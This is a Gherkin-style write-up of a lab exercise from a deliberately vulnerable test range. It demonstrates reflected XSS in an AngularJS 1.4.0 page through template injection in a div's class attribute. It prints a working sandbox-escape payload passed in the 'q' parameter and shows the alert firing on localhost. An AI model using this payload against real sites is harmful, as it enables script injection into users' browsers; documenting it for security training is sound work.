# language: en

Feature: AngularJS Interpolation - Non-Ng-attribite
  From Firing Range System
  Rule:
    REQ.173: https://fluidattacks.com/web/en/rules/173/

  Background:
    Given I'm running Windows 10 Enterprise 1803 (17134.228)
    And also using Firefox version 61.0.2
    Given the following
    """
    URL: http://localhost:8080/angular/angular_body_attribute_non_ng/1.4.0?q=
    Message: AngularJS Interpolation - Non-Ng-attribite
    Details:
      - The page has a div with a attribute class
      - The attribute value is changed by parameter q
    Objective: Perform an reflected xss on AngularJS
    """
    Scenario: AngularJS Interpolation - Non-Ng-attribite
    Given the inital site
    Given I inspect the page source code
    """
    <html ng-app>
      <body>
        <script src="//ajax.googleapis.com/ajax/libs/angularjs/1.4.0/angular.js"
        ></script>
        <div class="{{test}}"></div>
      </body>
    </html>
    """
    When I see the URL noticed that 'q' parameter is the attribute value
    And  I replace the 'q' parameter by the following code in html
    """
    q=}}{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };
    alert(document.domain)//');}}{{
    """
    Then The page was reloaded with our XSS injection
    """
    <html ng-app>
      <body>
        <script src="//ajax.googleapis.com/ajax/libs/angularjs/1.4.0/angular.js"
        ></script>
        <div class="{{}}{{'a'.constructor.prototype.charAt=[].join;$eval('x=1}}
        };alert(document.domain)//');}}{{}}"></div>
      </body>
    </html>
    """
    Then An alert is executed with localhost
    Then The vulnerability is verified